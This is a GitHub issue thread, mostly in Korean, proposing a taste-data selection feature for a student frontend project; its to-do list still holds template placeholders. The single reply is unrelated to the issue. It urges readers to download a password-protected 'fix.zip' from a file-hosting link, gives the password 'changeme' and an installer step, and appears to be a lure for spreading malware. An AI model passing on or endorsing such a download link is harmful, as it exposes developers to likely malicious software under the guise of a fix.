### ISSUE TITLE
취향 데이터 선택

### ISSUE THREAD

**Issue by woolen-h** [FRONTENDSCHOOL10/Pisa-s-4top#2]
## 📄 설명

취향 데이터 선택 기능

## 📋 TO-DO

- [ ] 해야 할 일 1
- [ ] 해야 할 일 2
- [ ] 해야 할 일 3

## 🔔 기타

기타 사항을 적어주세요.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
